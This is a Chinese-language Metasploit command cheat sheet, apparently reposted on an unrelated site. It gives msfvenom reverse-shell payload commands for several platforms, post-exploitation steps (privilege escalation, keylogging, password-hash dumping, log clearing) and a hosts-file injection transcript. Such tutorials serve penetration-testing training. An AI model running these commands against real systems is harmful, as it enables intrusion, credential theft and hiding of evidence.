网络安全:MSF常用命令总结

您所在的位置:网站首页 键盘如何返回上一层界面 网络安全:MSF常用命令总结

网络安全:MSF常用命令总结

2024-04-08 17:11| 来源: 网络整理| 查看: 265

[⊙成功在于你坚持了别人坚持不了的东西⊙]

目录 前言Metasploit常用模块开启msf命令MSF基础指令MSF中的Payload生成MSF命令参数MSF常用系统命令MSF网络命令渗透目标主机后使用的命令对host文件进行注入:

前言

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Metasploit常用模块 exploit(漏洞利用程序模板):包含各种 PoC 验证程序,用于验证利用特定漏洞(exploit)的可行性。payload(有效载荷模板):包含各种恶意程序,用于在目标系统上运行任意命令。它可能是 exploit 的一部分,也可能是独立编译的应用程序。Auxiliaries(辅助工具模板):包含一系列扫描、嗅探、拨号测试、指纹识别和其他类型的安全评估程序。Encoders(编码工具模板):在渗透测试中,这个模板用来加密有效载荷,以避免被杀毒软件、防火墙、IDS/IPS 以其他类似的反恶意软件检测出来。NOP(空操作模板):这个模板用于在 shellcode 中插入 NOP(汇编指令)。虽然 NOP 不会进行实际的操作,但是在构造 shellcode 时可以用来暂时替代 playload,形成完整的 shellcode 程序。 开启msf命令 msfconsole

查看数据库连接状态(一般会自动连接)

db_status MSF基础指令

help 或者 ? //帮助菜单 exit //退出MSF控制台 back //返回上一级 info //显示一个或者多个模块的信息 show //显示所给类型的模块 background //将当前操作在后台运行 use //使用所选择的模块 set //设置漏洞参数(rhost、rport等) unset //取消设置漏洞参数 search 漏洞name //查询漏洞工具 use 漏洞ID //使用漏洞工具 show options //查看漏洞工具配置 sessions -i //查看攻击状态

MSF中的Payload生成

1、Windows/Linux

Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

2、WEB

PHP: msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php ASP: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

3、Android

Android: msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk MSF命令参数 1 Options: 2 -p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all 4 -n, --nopsled 为payload预先指定一个NOP滑动长度 5 -f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) 6 -e, --encoder [encoder] 指定需要使用的encoder(编码器) 7 -a, --arch 指定payload的目标架构 8 --platform 指定payload的目标平台 9 -s, --space 设定有效攻击荷载的最大长度 10 -b, --bad-chars 设定规避字符集,比如: '\x00\xff' 11 -i, --iterations 指定payload的编码次数 12 -c, --add-code 指定一个附加的win32 shellcode文件 13 -x, --template 指定一个自定义的可执行文件作为模板 14 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 15 --payload-options 列举payload的标准选项 16 -o, --out 保存payload 17 -v, --var-name 指定一个自定义的变量,以确定输出格式 18 --shellest 最小化生成payload 19 -h, --help 查看帮助选项 20 --help-formats 查看msf支持的输出格式列表 MSF常用系统命令 check:检查指定特定目标是否存在安全漏洞,并且能被exploit(攻击模块)利用 sessions #sessions –h 查看帮助 sessions -i #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系统信息 ps # 查看当前活跃进程 kill 杀死进程 idletime #查看目标机闲置时间 reboot / shutdown #重启/关机 shell #进入目标机cmd shell MSF网络命令 ipconfig/ifconfig #查看IP地址 netstat –ano #查看端口情况 getproxy #查看代理信息 route #查看路由 渗透目标主机后使用的命令 inconfig:列举被渗透主机的网络接口信息 arp #列举被渗透主机的ARP缓存 shell:获取被渗透主机的cmd shell getuid:获取当前用户信息 getsystem:提权 getpid:查看Meterepreter会话在被渗透主机内的进程号 ps:列举被渗透主机的所有进程号 sysinfo:列举被渗透主机的信息系统 upload /initrd.img C:\\ :将文件上传到目标系统 rmdir **.txt :删除文件 enumdesktops :桌面命令 screenshot :截图 webcam_list :摄像头 获取键盘记录: 1. keyscan_start 2. keyscan_dump run hashdump :获取密码哈希值 clearev :清除系统日志 对host文件进行注入: msf6 exploit(windows/local/ms10_015_kitrap0d) > use post/windows/manage/inject_host msf6 post(windows/manage/inject_host) > options Module options (post/windows/manage/inject_host): Name Current Setting Required Description DOMAIN yes Domain name for host file manipulation. IP yes IP address to point domain name to. SESSION yes The session to run this module on. msf6 post(windows/manage/inject_host) > set session 1 session => 1 msf6 post(windows/manage/inject_host) > set ip 192.168.1.113 ip => 192.168.1.113d msf6 post(windows/manage/inject_host) > set domain www.tianxiu.com domain => www.tianxiu.com msf6 post(windows/manage/inject_host) > exploit [*] Inserting hosts file entry pointing www.tianxiu.com to 192.168.1.113.. [+] Done! [*] Post module execution completed msf6 post(windows/manage/inject_host) >

实践案例: 网络安全:kali之MSF工具基本使用方法

如有侵权,请联系删除!



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3